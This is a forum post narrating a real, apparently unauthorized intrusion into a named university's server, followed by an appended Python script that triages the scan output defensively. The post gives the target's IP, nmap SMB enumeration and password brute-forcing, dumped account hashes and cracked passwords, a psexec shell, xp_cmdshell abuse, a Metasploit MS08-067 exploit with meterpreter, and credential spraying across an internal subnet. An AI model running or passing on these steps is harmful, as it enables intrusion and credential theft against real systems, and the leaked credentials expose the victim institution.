nmap + msf intrusion of Guangxi Normal University

Posted by the original poster on 2012-12-4 12:46:42

Guangxi Normal University website: http://202.103.242.241

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241    // use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241    // list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241    // obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit the MS08-067 vulnerability against the target machine in msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254    // try to log in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
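An added example, not part of the original post and not code from nmap: the Python script below parses the "Host script results:" blocks that the smb-enum-users, smb-enum-shares, smb-brute, smb-pwdump and smb-check-vulns runs above print, and turns them into a ranked findings list, the way the owner of the scanned host would triage the same output. The sample input is a constructed excerpt modeled on the output above; parse_host_scripts(), triage() and the severity labels are this example's own choices. The constant AAD3B435B51404EE is the LM hash of an empty 7-character half, which is why the second half of the test account's LM hash shows that its password is at most 7 characters long.

```python
"""Added triage helper: turn nmap SMB NSE host-script output into findings.

The sample below is constructed from the output format shown in the post;
parse_host_scripts() and triage() are this example's own names, not nmap's.
"""
import re

# LM hashes are two independent 7-character halves. AAD3B435B51404EE is the
# hash of an empty half, so an LM hash ending in it means the password is at
# most 7 characters long.
EMPTY_LM_HALF = "AAD3B435B51404EE"
# Marker pwdump prints when the stored hash equals the empty-password hash.
NO_PASSWORD = "NO PASSWORD*********************"

# Constructed sample modeled on the "Host script results:" blocks in the post.
SAMPLE = """\
Host script results:
| smb-enum-users:
|_  Domain: EXAMPLE-HOST; Users: Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""


def parse_host_scripts(text):
    """Split nmap '| script-name:' blocks into {name: [body lines]}."""
    sections, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                              # scan summary lines, not script output
        body = raw[1:].lstrip("_").strip()        # '|_' just marks a block's last line
        head = re.match(r"^(smb-[\w-]+):$", body)
        if head:
            current = head.group(1)
            sections[current] = []
        elif current is not None:
            sections[current].append(body)
    return sections


def triage(text):
    """Return (severity, finding) pairs, most severe first."""
    s = parse_host_scripts(text)
    findings = []

    for line in s.get("smb-enum-users", []):
        m = re.search(r"Users:\s*(.+)", line)
        if m:
            users = [u.strip() for u in m.group(1).split(",")]
            findings.append(("MEDIUM", f"null session enumerates {len(users)} accounts: {', '.join(users)}"))

    share = None
    for line in s.get("smb-enum-shares", []):
        m = re.match(r"Anonymous access:\s*(\S+)", line)
        if m is None:
            share = line                          # a share name precedes its access line
        elif m.group(1) != "<none>":
            findings.append(("MEDIUM", f"share {share} grants anonymous {m.group(1)}"))

    for line in s.get("smb-brute", []):
        m = re.match(r"(\S+):(\S+)\s*=>\s*Login was successful", line)
        if m and m.group(2) == "<blank>":
            findings.append(("CRITICAL", f"account {m.group(1)} logs in with an empty password"))
        elif m:
            findings.append(("HIGH", f"account {m.group(1)} accepts a guessable password"))

    for line in s.get("smb-pwdump", []):
        m = re.match(r"(\S+):(\d+)\s*=>\s*([^:]+):([^:]+)$", line)
        if not m:
            continue
        user, rid, lm, nt = m.groups()
        if nt == NO_PASSWORD:
            findings.append(("CRITICAL", f"account {user} (RID {rid}) stores the empty-password hash"))
        elif lm != NO_PASSWORD:
            short = " and it is 7 characters or shorter" if lm.upper().endswith(EMPTY_LM_HALF) else ""
            findings.append(("HIGH", f"account {user} (RID {rid}) has an LM hash stored{short}; enable NoLMHash"))

    for line in s.get("smb-check-vulns", []):
        m = re.match(r"(MS\d{2}-\d{3}):\s*VULNERABLE", line)
        if m:
            findings.append(("CRITICAL", f"{m.group(1)} is unpatched; install the security update"))

    rank = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2}
    return sorted(findings, key=lambda f: rank[f[0]])


if __name__ == "__main__":
    for severity, text in triage(SAMPLE):
        print(f"[{severity}] {text}")
```

On the constructed sample the script reports nine findings: the blank administrator password, the two accounts whose stored hash is the empty-password hash and the unpatched MS08-067 come first, then the LM hashes (with the test account flagged as 7 characters or shorter) and the guessable password, and last the anonymous IPC$ read and the account list a null session hands out. Every item on that list corresponds to one step the post above relied on, so the list doubles as the remediation order: patch, set non-empty passwords on every account, stop storing LM hashes, and restrict anonymous SMB enumeration.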